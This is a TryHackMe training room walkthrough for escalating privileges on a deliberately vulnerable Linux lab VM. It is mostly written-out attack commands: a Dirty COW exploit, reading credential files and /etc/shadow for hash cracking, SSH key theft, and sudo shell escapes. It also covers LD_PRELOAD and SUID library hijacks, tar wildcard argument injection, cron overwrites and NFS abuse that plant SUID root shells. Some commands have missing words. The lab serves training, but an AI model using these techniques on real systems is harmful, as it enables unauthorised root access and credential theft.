Back to all walkthroughs
Linux PrivEsc Arena
Students will learn how to escalate privileges using a very vulnerable Linux VM. SSH is open. Your credentials are TCM:Hacker123
medium
75 min
33,357
To access material, start machines and answer questions login.
You can either use the browser-based terminal (which appears when you deploy the machine), or you can connect to TryHackMe's network (via OpenVPN) and in directly. If you've not done this before, first complete the OpenVPN room and learn how to connect.
Answer the questions below
Read the above.
This room will teach you a variety of privilege escalation tactics, including kernel exploits, sudo attacks, SUID attacks, scheduled task attacks, and more. This lab was built utilizing Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop (opens in new tab)) and utilized as part of The Cyber Mentor's Privilege Escalation Udemy course (://udemy.com/course/-privilege-escalation-for-beginners (opens in new tab)).
All tools needed to complete this course are in the user folder (/home/user/tools).
Let's first connect to the machine. is open on port 22. Your credentials are:
username: TCM
password: Hacker123
Answer the questions below
Deploy the machine and log into the user account via SSH (or use the browser-based terminal).
Detection
1. In command prompt type:
/home/user/tools/-exploit-suggester/-exploit-suggester.sh
2. From the output, notice that the is vulnerable to “dirtycow”.
Exploitation
1. In command prompt type:
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
2. In command prompt type: ./c0w
Disclaimer: This part takes 1-2 minutes - Please allow it some time to work.
3. In command prompt type: passwd
4. In command prompt type: id
From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Exploitation
1. In command prompt type: cat /home/user/myvpn.ovpn
2. From the output, make note of the value of the “auth-user-pass” directive.
3. In command prompt type: cat /etc/openvpn/auth.txt
4. From the output, make note of the clear-text credentials.
5. In command prompt type: cat /home/user/.irssi/config | grep -i passw
6. From the output, make note of the clear-text credentials.
Answer the questions below
What password did you find?
What user's credentials were exposed in the OpenVPN auth file?
Exploitation
1. In command prompt type: cat ~/.bash_history | grep -i passw
2. From the output, make note of the clear-text credentials.
Answer the questions below
What was TCM trying to log into?
Who was TCM trying to log in as?
Naughty naughty. What was the password discovered?
Detection
1. In command prompt type:
ls -la /etc/shadow
2. Note the file permissions
Exploitation
1. In command prompt type: cat /etc/passwd
2. Save the output to a file on your attacker machine
3. In command prompt type: cat /etc/shadow
4. Save the output to a file on your attacker machine
Attacker
1. In command prompt type: unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
Now, you have an unshadowed file. We already know the password, but you can use your favorite hash cracking tool to crack dem hashes. For example:
hashcat -m 1800 unshadowed.txt rockyou.txt -O
Answer the questions below
What were the file permissions on the /etc/shadow file?
Detection
1. In command prompt type:
find / -name authorized_keys 2> /dev/null
2. In a command prompt type:
find / -name id_rsa 2> /dev/null
3. Note the results.
Exploitation
1. Copy the contents of the discovered id_rsa file to a file on your attacker .
Attacker
1. In command prompt type: chmod 400 id_rsa
2. In command prompt type: -i id_rsa root@<ip>
You should now have a root shell :)
Answer the questions below
What's the full file path of the sensitive file you discovered?
Detection
1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.
Exploitation
1. In command prompt type any of the following:
a. sudo find /bin -name nano -exec /bin/sh \;
b. sudo awk 'BEGIN {system("/bin/sh")}'
c. echo ".execute('/bin/sh')" > shell.nse && sudo --script=shell.nse
d. sudo vim -c '!sh'
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.
Exploitation
1. In command prompt type:
sudo apache2 -f /etc/shadow
2. From the output, copy the root hash.
Attacker
1. Open command prompt and type:
echo '[Pasted Root Hash]' > hash.txt
2. In command prompt type:
john --wordlist=/usr/share/wordlists/.lst hash.txt
3. From the output, notice the cracked credentials.
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: sudo -l
2. From the output, notice that the LD_PRELOAD environment variable is intact.
Exploitation
1. Open a text editor and type:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
2. Save the file as x.c
3. In command prompt type:
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
4. In command prompt type:
sudo LD_PRELOAD=/tmp/x.so apache2
5. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command line type:
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
4. From the output, notice that a .so file is missing from a writable directory.
Exploitation
5. In command prompt type: mkdir /home/user/.config
6. In command prompt type: /home/user/.config
7. Open a text editor and type:
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
8. Save the file as libcalc.c
9. In command prompt type:
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
10. In command prompt type: /usr/local/bin/suid-so
11. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: dpkg -l | grep nginx
2. From the output, notice that the installed nginx version is below 1.6.2-5+deb8u3.
Exploitation
– Terminal 1
1. For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root
2. The root password is password123
3. Once escalated to root, in command prompt type: su -l www-data
4. In command prompt type: /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log
5. At this stage, the system waits for logrotate to execute. In order to speed up the process, this will be simulated by connecting to the via a different terminal.
– Terminal 2
1. Once logged in, type: su root
2. The root password is password123
3. As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1
4. Switch back to the previous terminal.
– Terminal 1
1. From the output, notice that the exploit continued its execution.
2. In command prompt type: id
Answer the questions below
What CVE is being exploited in this task?
What binary is SUID enabled and assists in the attack?
Detection
1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env
4. From the output, notice the functions used by the binary.
Exploitation
1. In command prompt type:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
2. In command prompt type: gcc /tmp/service.c -o /tmp/service
3. In command prompt type: export PATH=/tmp:$PATH
4. In command prompt type: /usr/local/bin/suid-env
5. In command prompt type: id
Answer the questions below
What is the last line of the "strings /usr/local/bin/suid-env" output?
Detection
1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env2
4. From the output, notice the functions used by the binary.
Exploitation Method #1
1. In command prompt type:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
2. In command prompt type:
export -f /usr/sbin/service
3. In command prompt type: /usr/local/bin/suid-env2
Exploitation Method #2
1. In command prompt type:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
Answer the questions below
What is the last line of the "strings /usr/local/bin/suid-env2" output?
Detection
1. In command prompt type: getcap -r / 2>/dev/null
2. From the output, notice the value of the “cap_setuid” capability.
Exploitation
1. In command prompt type:
/usr/bin/python2.6 -c 'import ; .setuid(0); .system("/bin/bash")'
2. Enjoy root!
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: cat /etc/crontab
2. From the output, notice the value of the “PATH” variable.
Exploitation
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
2. In command prompt type: chmod +x /home/user/overwrite.sh
3. Wait 1 minute for the Bash script to execute.
4. In command prompt type: /tmp/bash -p
5. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: cat /etc/crontab
2. From the output, notice the script “/usr/local/bin/compress.sh”
3. In command prompt type: cat /usr/local/bin/compress.sh
4. From the output, notice the wildcard (*) used by ‘tar’.
Exploitation
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
2. touch /home/user/--checkpoint=1
3. touch /home/user/--checkpoint-action=exec=sh\ runme.sh
4. Wait 1 minute for the Bash script to execute.
5. In command prompt type: /tmp/bash -p
6. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command prompt type: cat /etc/crontab
2. From the output, notice the script “overwrite.sh”
3. In command prompt type: ls -l /usr/local/bin/overwrite.sh
4. From the output, notice the file permissions.
Exploitation
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
2. Wait 1 minute for the Bash script to execute.
3. In command prompt type: /tmp/bash -p
4. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Detection
1. In command line type: cat /etc/exports
2. From the output, notice that “no_root_squash” option is defined for the “/tmp” export.
Exploitation
Attacker
1. Open command prompt and type: showmount -e MACHINE_IP
2. In command prompt type: mkdir /tmp/1
3. In command prompt type: mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1
In command prompt type:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
4. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
5. In command prompt type: chmod +s /tmp/1/x
1. In command prompt type: /tmp/x
2. In command prompt type: id
Answer the questions below
Click 'Completed' once you have successfully elevated the machine
Ready to learn Cyber Security?
TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.
Already have an account? Log in